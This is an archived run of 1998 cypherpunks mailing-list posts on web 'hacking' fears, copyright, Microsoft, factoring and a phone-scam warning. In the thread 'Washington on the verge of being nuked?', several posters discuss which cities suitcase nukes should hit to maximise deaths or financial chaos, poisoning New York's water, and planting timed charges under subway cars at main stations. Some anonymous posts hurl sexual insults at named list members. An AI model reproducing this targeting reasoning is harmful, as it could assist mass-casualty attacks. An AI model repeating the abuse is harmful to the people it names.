Message-ID: <199802070148.CAA26783@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



sphantom wrote:

> If someone named SandMan asks you to check out his page on the WEB
> 
> DO NOT!!!
> 
> It is at www.geocities.com/vienna/6318
> 
> This page hacks into your C:/ drive.  DO NOT GO THERE


All I see there is a few midi files and some badly-written HTML.
Nothing there to hack into my C:/ drive.  I don't even have a C: drive.
If you were running a more secure operating system, you wouldn't either.


> I am curious how this person does it.
> 

You obviously haven't been reading this list very long.  There are lots
of way to do nasty things to microslob windoze, including: Buffer overruns
in IE, javascript bugs in web browsers, launching applications thru
mime-types, SMB bugs (oob-attack, cd ..\, and others), macro (and other)
viruses, buffer overruns in the tcp stack (oversized pings, etc), as well
as the near infinite number of possible active-x exploits.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 7 Feb 1998 14:46:42 +0800
To: cypherpunks@toad.com
Subject: BBN
Message-ID: <199802070630.HAA00869@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C[unt] May is the living proof that anal sex 
causes pregnancy.

       ____
       \ _/__ Timothy C[unt] May
        \\  /
          \/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@REPLAY.COM>
Date: Sat, 7 Feb 1998 15:02:10 +0800
To: cypherpunks@cyberpass.net
Subject: <>
Message-ID: <199802070635.HAA01426@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP MESSAGE-----
Version: 2.6.2

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
=wNBG
-----END PGP MESSAGE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sun, 8 Feb 1998 02:36:54 +0800
To: cypherpunks@ssz.com
Subject: Galombos and a World where Ideas can be Protected
In-Reply-To: <199802051634.KAA02262@einstein.ssz.com>
Message-ID: <v03102800b10256ed71a9@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 6:12 PM -0800 2/6/98, bill.stewart@pobox.com wrote:
>At 10:34 AM 2/5/98 -0600, Jim Choate wrote:
>>If there were no copyright nobody would have any reason to market
>>software or much else for that matter. I would predict that much of
>>the technology and infrastructure we have now wouldn't exist.
>>It would also stiffle [sic] creativity and new methodologies because
>>there would be no profit in it to recoup development costs.
>
>If there were no copyright, markets for information and entertainment
>would definitely have evolved differently than they have in the US
>and Europe, and would use much different mechanisms for getting money
>to the producers of information, such as standard sale contracts.*
....

It's always hard to say how reality would look in a different universe, one
with, say, no copyright laws.

However, we have some indications, because there are some things which are
very much like "intellectual property" which, in fact, have no protection
in the courts.

Namely, _ideas_.

For better or for worse, ideas are not protected against copying, use, etc.

(Before anyone jumps in and cites patents, by "ideas" I mean scientific
discoveries, philosophical expressions, aphorisms, and so on, not
_expressions_ of ideas in the form of working gadgets. And not "software
patents" (with which I disagree, as do many of us). And not _specific_
instances of ideas in the form of essays or stories or whatever, which of
course _can_ be copyrighted.)

In our society, and in all societies with which I'm familiar, having a good
idea is not protectable. (Again, not counting inventions and such.)

And yet society works fine. Those who keep coming up with ideas find ways
to keep coming up with ideas, and often to prosper, as writers,
consultants, etc., often because of their ability to generate ideas.

(There is a radical, and bizarre, subsect of libertarians called
"Galambosians," who argue that even ideas are property. In their view, I
could charge people 10 cents or a dollar or such for their usage of "crypto
anarchy" ideas, or "Big Brother Inside" ideas, or for being influenced by
my ideas in other ways. Hard to enforce, I'd say. Which is probably why the
ideas of Galombos are not copied by many others. In his system, he'd be a
pauper.)

Think about an alternate world where ideas are protectable before saying a
world without copyrights would collapse inevitably.

--Tim May

Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sun, 8 Feb 1998 04:17:16 +0800
To: cypherpunks@Algebra.COM
Subject: Washington on the verge of being nuked?
In-Reply-To: <3.0.5.32.19980206181238.007b4ac0@popd.ix.netcom.com>
Message-ID: <v03102801b1026b2130d3@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain




Remember to stay well clear of soft targets as the war with Albania, er,
Iraq starts in the next few weeks.

Yeltsin warns the U.S. publically that an attack on Iraq could have grave
consequences, perhaps even leading to another world war.

He was almost certainly _not_ threatening to use his own nukes against the
U.S.  So what was he talking about?

Maybe he and his intelligence services have a clearer idea of where some of
those 50 to 70 missing suitcase nukes have ended up. Saddam still had a lot
of money even after the Gulf War.

Mightn't he have bought some of those surplus nukes?

Plenty of time over the past couple of years to get them into major U.S.
cities. Especially cities like Washington and New York.

If Iraq's cities and palaces and such are bombed, as expected, he may put
out the order to hit the enemy where it will hurt. A timer set for an hour
and the agents are well away from the blast.

Biological agents are, I think, less likely to do widespread damage. In a
few years, perhaps, when the technology is more widely available, but for
now it looks like U.S.-class bioweapons are not yet available to so-called
terrorists.

Of course, after such an attack, though hundreds of thousands of criminals
may be disposed of in Washington, martial law and a suspension of the
Constitution can be expected. So it won't be all good news. And financial
chaos may reign if business centers are hit.

Downtown Washington is the last place I'd want to be. For multiple reasons.

--Tim May

Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sun, 8 Feb 1998 06:10:18 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: Washington on the verge of being nuked?
In-Reply-To: <v03102801b1026b2130d3@[207.167.93.63]>
Message-ID: <v03102802b1028867116f@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 1:31 PM -0800 2/7/98, Declan McCullagh wrote:

>I live in Adams Morgan, perhaps a mile from downtown Washington. Of course
>I work in the heart of DC, in the lobbyist corridor, blocks from the White
>House and agencies like the FCC. (Note to terrorists: the Pentagon is miles
>away, on the other side of the Potomac. Take the blue or yellow Metro
>lines. You can lug your H-bomb through the handicapped turnstiles for no
>additional fee.)

(Tariq, make note of this!)

>I've tentatively decided against moving all the way to West Virginia, which
>is 60 miles away. I'm now thinking of moving around 40 miles out, close to
>the WV border tho still in Virginia. Main reason is the commute. But it'll
>still be in farm country.

Someplace like Leesburg? Horse country.

>Still, as I've said before, if terrorists are going to blow anything up, it
>makes more sense for them to go after Manhattan. Though it is on an island,
>which might make logistics and escape (?) difficult.

Depends on what the goal is. I would assume Iraq would be a lot more
interested in making a symbolically important statement by hitting the
capital of the Great Satan (Tariq, help me out here).

If the goal is simple disruption of finances, NYC is probably a better goal
(though a hit on D.C. would trigger lots of chaos, too). If the goal is
killing people, I'm not sure what the best target would be...it might be
some other city completely, depending on wind conditions, presence of
refineries and oil storage tanks, dams, etc.

But I would bet on D.C. being Ground Zero for all the various freedom
fighters the U.S. colonialist/paternalistic superpower actions have pissed
off.

Of course, hitting _both_ D.C. and NYC might make a lot of sense.
Especially in case one bomb fizzles. If they have several suitcase nukes,
it makes more sense to deploy them in several cities than to have the damge
zones overlap (or even have one blast affect the later bombs).

Timing could be within seconds easily enough, but even spaced hours apart
there would be virtually no chance for NEST to find them.

Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@temp0209.myriad.ml.org (Matthew Ghio)
Date: Sun, 8 Feb 1998 03:12:29 +0800
To: cypherpunks@cyberpass.net
Subject: Re: the best justice money can buy --Lessig suspended
In-Reply-To: <19980203.154218.attila@hun.org>
Message-ID: <199802071906.OAA06180@myriad>
MIME-Version: 1.0
Content-Type: text/plain



Tim May wrote:

> (The real issue is going to be Web servers. Whether Netscape can prosper
> in the world that is coming is unclear.)
[snip]
> Looks to me like Intel is the real winner here.

Apache currently represents over 50% of the web servers in use.  Even
Microsoft can't compete with that.  Microsoft's growth in web servers has
been largely at Netscape's expense.  So Netscape's move to the freeware
market is not unexpected, but it's a bit late; they should have been
pushing Linux/FreeBSD/etc to their NT customers long ago.

The issue of differing tactics of Intel versus Microsoft has a lot to do
with why Microsoft is getting scrutinized while Intel is largely being
left alone, despite their similiar market share.

The first difference is product quality.  I have an Intel Pentium which
has been working flawlessly for months.  Microsoft Windows, on the other
hand, can't go two days without getting screwed up in one way or another.
Intel has had two or three major flaws in their products in the last few
years (FDIV, F00F, and the fpu flag problem).  Microsoft gets blamed for
new flaws every week.  Guess which company I have a higher opinion of?
I am certainly not the only one who feels this way.

Second, Microsoft is rude, arrogant, and offensive.  They absolutely do
not know when to quit, no matter how much bad publicity it gets them.
Intel's behaviour hasn't been exemplary recently either, but they do know
when to back off.  Intel got in a little argument with Robert Collins a
few years ago, but once the bad PR started, they left him alone.
Microsoft, in contrast, has repeatedly harassed anti-microsoft web sites
(such as www.micr0soft.com) kicked anti-microsoft people out of comdex,
and so on.  Like Scientology, such tactics usually only increase the
attacks from critics.

Intel's handling of the "slot 1" was a major mistake.  Intel came off
appearing to be a bully trying to squash competition, which earned them a
lot of bad press.  Settling with Cyrix/NatSemi was a smart move (which
they should have done earlier).  But at least Intel knew when to cut their
losses and move on to other things.  Contrast that with Microsoft's
adamant, pig-headed pursuit of their bundling strategy; no matter how much
bad publicity it gets them, they keep doggedly trying to shove it down
people's throats.

So next time you're meeting with Intel management, remind them that if
they make quality products, their customers will be happy.  If they sell
lousy products and attack their opponents, they will get attacked back.

(And Intel- please stop telling us about how great your secret
proprietary bus interfaces are, we don't want to hear it, and it makes
you look bad.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Sun, 8 Feb 1998 05:34:12 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Washington on the verge of being nuked?
In-Reply-To: <v03102800b10256ed71a9@[207.167.93.63]>
Message-ID: <v03007803b1027fe0ea2b@[168.161.105.216]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:02 -0800 2/7/98, Tim May wrote:
>Of course, after such an attack, though hundreds of thousands of criminals
>may be disposed of in Washington, martial law and a suspension of the
>Constitution can be expected. So it won't be all good news. And financial
>chaos may reign if business centers are hit.
>
>Downtown Washington is the last place I'd want to be. For multiple reasons.

I live in Adams Morgan, perhaps a mile from downtown Washington. Of course
I work in the heart of DC, in the lobbyist corridor, blocks from the White
House and agencies like the FCC. (Note to terrorists: the Pentagon is miles
away, on the other side of the Potomac. Take the blue or yellow Metro
lines. You can lug your H-bomb through the handicapped turnstiles for no
additional fee.)

I've tentatively decided against moving all the way to West Virginia, which
is 60 miles away. I'm now thinking of moving around 40 miles out, close to
the WV border tho still in Virginia. Main reason is the commute. But it'll
still be in farm country.

Still, as I've said before, if terrorists are going to blow anything up, it
makes more sense for them to go after Manhattan. Though it is on an island,
which might make logistics and escape (?) difficult.

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 8 Feb 1998 01:00:56 +0800
To: cypherpunks@cyberpass.net
Subject: Ziff-Davis on AP
Message-ID: <199802071651.RAA08477@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



http://www.zdnet.com/zdnn/content/zdnn/0206/282755.html

> Pie attack has executives worried
> By Charles Cooper
> February 6, 1998 12:10 PM PST
> ZDNN 
> 
> This time it was a custard pie in the face. Could it just have
> easily been a bullet in the gut? 
> 
> That is the subject du jour among startled industry
> executives following the bizarre assault in Brussels
> Wednesday against Bill Gates. While en route to deliver a
> speech on technology and education, Microsoft's chief
> executive was nailed in the kisser by a local prankster who
> has made a reputation for pulling similar stunts. Gates, who
> was unhurt, suffered no more than a wound to his pride,
> soggy glasses, and an unexpected charge on his weekly
> cleaning bill. 
> 
[snip for fair use]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 8 Feb 1998 08:25:21 +0800
To: cypherpunks@toad.com
Subject: Re: Washington on the verge of being nuked?
In-Reply-To: <v03102802b1028867116f@[207.167.93.63]>
Message-ID: <RB1Jke6w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim May <tcmay@got.net> writes:
> Depends on what the goal is. I would assume Iraq would be a lot more
> interested in making a symbolically important statement by hitting the
> capital of the Great Satan (Tariq, help me out here).
>
> If the goal is simple disruption of finances, NYC is probably a better goal
> (though a hit on D.C. would trigger lots of chaos, too). If the goal is
> killing people, I'm not sure what the best target would be...it might be
> some other city completely, depending on wind conditions, presence of
> refineries and oil storage tanks, dams, etc.
>
> But I would bet on D.C. being Ground Zero for all the various freedom
> fighters the U.S. colonialist/paternalistic superpower actions have pissed
> off.

NYC is the seat of the United Nations.  It would make a good nuke target
during one of those UN events when a bunch of heads of state visit.

For an impact on the financial markets, nuke NYC and London at least.

NYC is also vulnerable to chemicals in the water system.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nibor55@juno.com (robin parker)
Date: Sun, 8 Feb 1998 09:21:55 +0800
To: ashleeslut@hermama.com
Subject: "Ken and Brenda Kingston" <kingston@cheerful.com>: Telephone Scam Alert
Message-ID: <19980207.180654.3166.6.nibor55@juno.com>
MIME-Version: 1.0
Content-Type: text/plain



--------- Begin forwarded message ----------
From: "Ken and Brenda Kingston" <kingston@cheerful.com>
To: "Bill Manago" <managob@primenet.com>,"Ken Kingston"
<kingstob@fhu.disa.mil>,"Mark & Kay Barrett" <msblkb@primenet.com>,"Mike
& Dianne Higgs" <homeys@primenet.com>,"Mike Roberts" <n9lem@aol.com>,
"Rachel M Parker" <xyz987@juno.com>,"Robin Parker" <nibor55@juno.com>
Subject: Telephone Scam Alert
Date: Fri, 6 Feb 1998 20:07:14 -0700
Message-ID: <001601bd3375$82a232a0$b037c5a9@pc1>

I want to let all my friends know about this scam going around.  It does
not matter who your local or long distance carrier is, this can cost you
a
lot of money.  Please read and if you get a call like this, report it to
the police and the FCC.  If you have a caller ID, get the number too.

Subject: High Priority message

High Priority **

On Saturday,  24 January 1998, Naval Air Station, Joint Reserve Base,
New Orleans' Quarterdeck received a telephone call from an individual
identifying himself as an AT&T Service Technician that was running a
test on our telephone lines.  He stated that to complete the test the
QMOW should touch nine (9), zero (0), pound sign (#) and hang up.
Luckily, the QMOW was suspicious and refused.  Upon contacting the
telephone company we were informed that by pushing 90# you end up giving
the individual that called you access to your telephone line and
allows them to place a long distance telephone call, with the charge
appearing on your telephone call.  We were further informed that this
scam
has
been originating from many of the local jails/prisons.  Please "pass the
word".

Brenda


--------- End forwarded message ----------

_____________________________________________________________________
You don't need to buy Internet access to use free Internet e-mail.
Get completely free e-mail from Juno at http://www.juno.com
Or call Juno at (800) 654-JUNO [654-5866]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 8 Feb 1998 08:40:08 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Washington on the verge of being nuked?
Message-ID: <1.5.4.32.19980208003515.00744198@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Manhattan would be easily blown, remotely. Place a time-charge
beneath a car at the head each principal subway line (which
commence in other boroughs), set to blow at the main stations.

For the West Side, supplement with a charge in the PATH train 
from Jersey.

For the East Side, supplement with another in the LI Railroad 
from the Island.

Forget anything above 86th Street, they'll applaud; like the
WVA and VA hillfolks will hooray the destruction of see-navel 
DC and its high-pitch babbling wonks.

As will anyone of any capital (or high-tech vale), globally, not 
drunk with power or mad to get it.

That's what horrifies the powerful about of terrorists: they're both
spitting images of their opponents. Both willing to kill indiscriminately 
for vainglory of blind faith and ambition. Both willing to betray
their kind for a step up.

Probably the stealth bombers will led by a highly trained ex-, 
or covert member, or Top Gun grad, of a duly authorized 
terrorist, wing, sub, cell set up to kill for a culture's honor and
commerce -- for blood-drenched national security. USG
and IraqG, any G, joined at birth, never separated, working
in concert.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: contest@compbroker.com
Date: Sun, 8 Feb 1998 03:58:26 +0800
To: cypherpunks@toad.com
Subject: Monthly memory giveaway - now win up to 64 Megabytes of Memory!
Message-ID: <854712721210.8391275815@compbroker.com>
MIME-Version: 1.0
Content-Type: text/plain



      For the February 1st Drawing, our grand prize winner of the
                            64MB Memory is

                     Michael Rowe of Akron, OH

You could be the next lucky winner!

The Memory Broker has increased it's prizes.  Every month
we will select 3 random winners from our contest database.
The First Place winnner (i.e. first name drawn) wins an incredible 64Mb of RAM, 2nd place wins 32MB of EDO RAM, and the third lucky winner gets 16MB of RAM.  You can also apply the winning memory as credit towards a future order.

No purchase is necessary to win.  Winners are selected by a random drawing, so the more times you enter (once per day only please), the better your chances to win!

Enter Now at http://www.compbroker.com/

Good Luck!

The Memory Broker Inc.
http://www.compbroker.com
contest@compbroker.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Sun, 8 Feb 1998 11:39:36 +0800
To: cypherpunks@toad.com
Subject: Re:  BBN
Message-ID: <199802080315.WAA06152@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Haven't met a cypherpunks digest I like yet.

In the mean time, I'm going to have a little fun.

----

   >   From dlv@bwalk.dm.com Sat Feb  7 01:46:44 1998
   >   To: cypherpunks@toad.com
   >   Subject: BBN
   >   
   >   I have decided to come out of my cave and say it:
   >   
   >      I want to suck John Gilmore's cock.
   >
   >   Dr.Dimitri Vulis KOTM
   >   Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

That's understandable Dimitry...Marina must taste like dead fish.
---guy





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Tu <ATU5713@compuserve.com>
Date: Sun, 8 Feb 1998 11:39:31 +0800
To: Cypher Punks Mailing List <cypherpunks@toad.com>
Subject: What's the latest in factoring?
Message-ID: <199802072222_MC2-3262-79F5@compuserve.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Hi all,

First, I want to say that because I've heard that traffic on this list is
heavy, and I don't have time to file away 40 messages a day, you must
write to me personally in order for me to see the message.  My PGP key is
provided at the end of this message.

What is the latest factoring breakthrough (at least in the civilian
world?)  I had heard a while back that the most recent event was
accomplished by Samuel Wagstaff of Purdue University, whose team factored
(3^349-1)/2, which is a 167-digit number (about 552 bits).  Is there
anything more recent?  Also, whereas 1024 bits was the commonly accepted
threshhold for key lengths more than two years ago, what's the threshhold
now?  Because I have DOS (and like it) I use PGP 2.63ix, when should I
retire my 1024-bit key?  I don't expect anybody to answer that I should
do so immediately, but can someone give me an idea on what people are
doing in regard to key length?

Sincerely,

Alan Tu


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv
Comment: Requires PGP version 2.6 or later.

iQCVAwUBNN0kkJezmBrl2RXhAQGxnAP9HyIvtTcOeN77s3p80OmSefhagtfxQGEm
H3NqWzxrqEvfODat63UFDVxcf28cSSog3666Icys1nLY9JhNSFZrruejbRIJ6P4o
AKHfxBwUSO00GvSyCl9nI5VjJDoRG2elDZf7iPP1M9h+IoTXuSDpdWnL9uBpqhvi
SFg4sXOKEOA=
=co6G
-----END PGP SIGNATURE-----

Type Bits/KeyID    Date       User ID
pub  1024/E5D915E1 1997/04/27 Alan Tu <atu5713@compuserve.com>
                              Alan Tu <102534.2165@compuserve.com>

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i
Comment: Requires PGP version 2.6 or later.

mQCNAzNivkwAAAEEALdGUXD3j+RioIirVG46N6LaGD3YMMVVT5Mjwr5JojQsDICy
856I06Ugo/Fqid2A/os7v/gwE+Sj/WhMERgTsTejUZtsucTpS9sae+cc27Fjjq1l
hOnqcLZqnHDDNyn3+jesVFPLnRlSoHbmcBK1XDW/SJT1anZz55ezmBrl2RXhAAUR
tCBBbGFuIFR1IDxhdHU1NzEzQGNvbXB1c2VydmUuY29tPokAlQIFEDOguk6Xs5ga
5dkV4QEBBF8D/1B0ePqlMavWEUMP0uTmyvWFI7jooAcih6uHZFo2u+u3EzE2Is8X
EoLHg39DhjleTHPu6TnGsWIiwDYEslzYeVw/Cglx6eliYIr/qs7peEywuhtZsEFH
ln6yR9IE6rX3b3GCvPSQ5uPhXWrd2kWaZvG4rQ4Oj1m3yTrFaPRqCBPvtCRBbGFu
